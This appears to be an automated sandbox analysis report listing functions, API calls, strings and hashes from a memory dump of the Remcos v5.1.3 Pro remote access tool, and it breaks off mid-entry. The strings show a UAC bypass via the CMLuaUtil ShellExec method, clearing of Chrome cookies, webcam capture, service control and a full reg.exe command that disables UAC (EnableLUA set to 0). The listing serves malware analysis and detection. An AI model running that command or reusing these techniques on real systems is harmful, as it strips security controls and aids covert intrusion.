                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                  Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                  • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                  Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  • CoUninitialize.OLE32 ref: 00407664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-1839356972
                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                  Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                  Strings
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                  • UserProfile, xrefs: 0040BAE8
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                  • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                  Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AllocOutputShowWindow
                                                  • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                  • API String ID: 2425139147-2212855755
                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                  Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                  • __allrem.LIBCMT ref: 0043AD51
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                  Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                  • API String ID: 3469354165-3054508432
                                                  • Opcode ID: c9c8c556a156b08ca1f4ae787fccd75c1cb4fb9dff4f64211de25059e72c3e49
                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                  • Opcode Fuzzy Hash: c9c8c556a156b08ca1f4ae787fccd75c1cb4fb9dff4f64211de25059e72c3e49
                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                  Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                  • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                  • String ID:
                                                  • API String ID: 3950776272-0
                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                  Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: b8ae44c08c0882fa39500d2d2dac1bf8c00faf8b5df33dcca1ed9daa4f2809fe
                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                  • Opcode Fuzzy Hash: b8ae44c08c0882fa39500d2d2dac1bf8c00faf8b5df33dcca1ed9daa4f2809fe
                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                  Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                  • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                  Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • _free.LIBCMT ref: 004482CC
                                                  • _free.LIBCMT ref: 004482F4
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • _abort.LIBCMT ref: 00448313
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                  • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                  Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                  Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                  Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                  Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                  • GetLastError.KERNEL32 ref: 0041D611
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                  Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                  Strings
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                  Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                  • SG, xrefs: 00407715
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  • API String ID: 0-643455097
                                                  • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                  • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                  Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                  Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                  • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                  Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
